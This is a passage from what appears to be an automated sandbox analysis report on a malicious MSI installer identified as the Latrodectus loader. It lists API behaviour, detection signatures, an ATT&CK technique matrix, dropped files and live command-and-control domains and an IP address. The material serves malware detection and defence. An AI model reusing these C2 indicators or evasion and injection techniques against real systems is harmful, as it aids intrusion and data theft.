                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B56E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B56E1B
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000180070760
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000000018006F6E0

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.21.46.75 443Jump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B352F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,5_2_00B352F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle,6_2_000000018004A650
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,6_2_0000000180049278
                      Source: 360total.dll.2.drBinary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
                      Source: rundll32.exeBinary or memory string: Progman
                      Source: rundll32.exeBinary or memory string: Program manager
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B535A9 cpuid 5_2_00B535A9
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: EnumSystemLocalesW,5_2_00B6E0C6
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: EnumSystemLocalesW,5_2_00B6E1AC
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: EnumSystemLocalesW,5_2_00B67132
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: EnumSystemLocalesW,5_2_00B6E111
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00B6E237
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: GetLocaleInfoEx,5_2_00B523F8
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: GetLocaleInfoW,5_2_00B6E48A
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_00B6E5B3
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: GetLocaleInfoW,5_2_00B6E6B9
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: GetLocaleInfoW,5_2_00B676AF
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00B6E788
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00B6DE24
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B537D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00B537D5
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF8AE0 GetUserNameA,wsprintfA,6_2_0000026387CF8AE0
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B67B1F GetTimeZoneInformation,5_2_00B67B1F
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress,6_2_0000000180040CB0
                      Source: rundll32.exeBinary or memory string: 360tray.exe
                      Source: rundll32.exeBinary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                      Source: rundll32.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 6.2.rundll32.exe.26387cf0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2095b810000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.26387ce0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.26387ce0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2268d6d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2095b820000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2095b820000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2095b810000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2268d6d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2268d6c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2268d6c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.26387cf0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000003.3230953855.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2135345986.000002268D6C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2135365322.000002268D6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2974432949.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3348940328.000002095B810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3349009831.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3348957722.000002095B820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.3287402342.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.3130529388.000002095BDE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3348028990.000000E23987A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2113131628.0000026387CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2224, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 6.2.rundll32.exe.26387cf0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2095b810000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.26387ce0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.26387ce0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2268d6d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2095b820000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2095b820000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2095b810000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2268d6d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2268d6c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2268d6c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.26387cf0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000003.3230953855.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2135345986.000002268D6C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2135365322.000002268D6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2974432949.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3348940328.000002095B810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3349009831.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3348957722.000002095B820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.3287402342.000002095BA10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.3130529388.000002095BDE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3348028990.000000E23987A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2113131628.0000026387CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2224, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts
                      2
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Exploitation for Privilege Escalation
                      1
                      Deobfuscate/Decode Files or Information
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomains1
                      Replication Through Removable Media
                      1
                      Scheduled Task/Job
                      1
                      Valid Accounts
                      1
                      DLL Side-Loading
                      2
                      Obfuscated Files or Information
                      LSASS Memory11
                      Peripheral Device Discovery
                      Remote Desktop ProtocolData from Removable Media21
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Service Execution
                      1
                      Windows Service
                      1
                      Valid Accounts
                      1
                      DLL Side-Loading
                      Security Account Manager1
                      Account Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      Scheduled Task/Job
                      11
                      Access Token Manipulation
                      1
                      File Deletion
                      NTDS1
                      File and Directory Discovery
                      Distributed Component Object ModelInput Capture113
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      Windows Service
                      121
                      Masquerading
                      LSA Secrets34
                      System Information Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                      Process Injection
                      1
                      Valid Accounts
                      Cached Domain Credentials251
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                      Scheduled Task/Job
                      1
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                      Access Token Manipulation
                      Proc Filesystem3
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                      Process Injection
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Rundll32
                      Network Sniffing1
                      System Owner/User Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                      System Network Configuration Discovery
                      Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431884 Sample: ad.msi Startdate: 25/04/2024 Architecture: WINDOWS Score: 88 47 jarinamaers.shop 2->47 51 Found malware configuration 2->51 53 Yara detected Latrodectus 2->53 55 Sample uses string decryption to hide its real strings 2->55 57 2 other signatures 2->57 7 rundll32.exe 2 2->7         started        11 msiexec.exe 15 38 2->11         started        13 msiexec.exe 9 2->13         started        15 rundll32.exe 2->15         started        signatures3 process4 file5 27 C:\Users\user\AppData\...\Update_71a2ec86.dll, PE32+ 7->27 dropped 29 :wtfbbq (copy), PE32+ 7->29 dropped 59 Contains functionality to compare user and computer (likely to detect sandboxes) 7->59 61 Contains functionality to detect sleep reduction / modifications 7->61 17 rundll32.exe 12 7->17         started        31 C:\Windows\Installer\MSIB6D3.tmp, PE32 11->31 dropped 33 C:\Windows\Installer\MSIB5A8.tmp, PE32 11->33 dropped 35 C:\Windows\Installer\MSIB539.tmp, PE32 11->35 dropped 37 C:\Users\user\AppData\Local\...\360total.dll, PE32+ 11->37 dropped 63 Drops executables to the windows directory (C:\Windows) and starts them 11->63 21 MSIB6D3.tmp 11->21         started        23 msiexec.exe 11->23         started        25 msiexec.exe 11->25         started        39 C:\Users\user\AppData\Local\...\MSIB29F.tmp, PE32 13->39 dropped 41 C:\Users\user\AppData\Local\...\MSIB25F.tmp, PE32 13->41 dropped 43 4 other files (none is malicious) 13->43 dropped signatures6 process7 dnsIp8 45 jarinamaers.shop 104.21.46.75, 443, 49723, 49724 CLOUDFLARENETUS United States 17->45 49 System process connects to network (likely due to code injection or exploit) 17->49 signatures9

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      ad.msi8%ReversingLabs
                      SourceDetectionScannerLabelLink
                      :wtfbbq (copy)8%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSIB151.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSIB1DF.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSIB1FF.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSIB22F.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSIB25F.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSIB29F.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\sharepoint\360total.dll8%ReversingLabs
                      C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll8%ReversingLabs
                      C:\Windows\Installer\MSIB539.tmp0%ReversingLabs
                      C:\Windows\Installer\MSIB5A8.tmp0%ReversingLabs
                      C:\Windows\Installer\MSIB6D3.tmp0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://jarinamaers.shop/live/r0%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/50%Avira URL Cloudsafe
                      https://wrankaget.site/live/0%Avira URL Cloudsafe
                      ftp://ftp%2desktop.ini0%Avira URL Cloudsafe
                      https://jarinamaers.shop/x0%Avira URL Cloudsafe
                      https://jarinamaers.shop/rRb&u0%Avira URL Cloudsafe
                      https://jarinamaers.shop/fb0%Avira URL Cloudsafe
                      https://jarinamaers.shop/.b0%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/IP0%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/RYPT32.dll.mui3N0%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/zTEum0%Avira URL Cloudsafe
                      https://jarinamaers.shop/d0%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/ace0%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/060%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/I0%Avira URL Cloudsafe
                      https://jarinamaers.shop/0%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      jarinamaers.shop
                      104.21.46.75
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://wrankaget.site/live/true
                        • Avira URL Cloud: safe
                        unknown
                        https://jarinamaers.shop/live/true
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://jarinamaers.shop/live/IPrundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://jarinamaers.shop/live/5rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://jarinamaers.shop/.brundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://jarinamaers.shop/live/rrundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://pconf.f.360.cn/safe_update.phprundll32.exefalse
                          high
                          https://jarinamaers.shop/xrundll32.exe, 00000007.00000003.3230609342.0000020959EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          ftp://ftp%2desktop.inirundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.drfalse
                          • Avira URL Cloud: safe
                          low
                          https://jarinamaers.shop/fbrundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://jarinamaers.shop/rRb&urundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://jarinamaers.shop/live/RYPT32.dll.mui3Nrundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://jarinamaers.shop/live/06rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://jarinamaers.shop/live/zTEumrundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://jarinamaers.shop/rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://pscan.f.360.cn/safe_update.phprundll32.exefalse
                            high
                            https://jarinamaers.shop/live/acerundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://dr.f.360.cn/scanlistrundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.drfalse
                              high
                              https://www.thawte.com/cps0/ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drfalse
                                high
                                https://jarinamaers.shop/live/Irundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clierundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.drfalse
                                  high
                                  https://www.thawte.com/repository0Wad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drfalse
                                    high
                                    http://sconf.f.360.cn/client_security_confrundll32.exefalse
                                      high
                                      http://dr.f.360.cn/scanrundll32.exefalse
                                        high
                                        https://jarinamaers.shop/drundll32.exe, 00000007.00000003.3230609342.0000020959EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.advancedinstaller.comad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drfalse
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.21.46.75
                                          jarinamaers.shopUnited States
                                          13335CLOUDFLARENETUStrue
                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1431884
                                          Start date and time:2024-04-25 22:42:09 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 37s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:13
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:ad.msi
                                          Detection:MAL
                                          Classification:mal88.troj.evad.winMSI@12/30@1/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 38
                                          • Number of non-executed functions: 327
                                          Cookbook Comments:
                                          • Found application associated with file extension: .msi
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: ad.msi
                                          TimeTypeDescription
                                          22:43:35API Interceptor5151031x Sleep call for process: rundll32.exe modified
                                          No context
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CLOUDFLARENETUShttps://fusiongsb.com/wofice/Get hashmaliciousUnknownBrowse
                                          • 104.21.20.41
                                          https://c-m-c-group.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                          • 104.17.2.184
                                          https://falic.co/office/office_cookies/main/Get hashmaliciousUnknownBrowse
                                          • 172.67.212.156
                                          https://autode.sk/4bb5BeVGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                          • 104.17.27.92
                                          https://lide.alosalca.fun/highbox#joeblow@xyz.comGet hashmaliciousHTMLPhisherBrowse
                                          • 104.26.13.205
                                          https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                          • 104.17.25.14
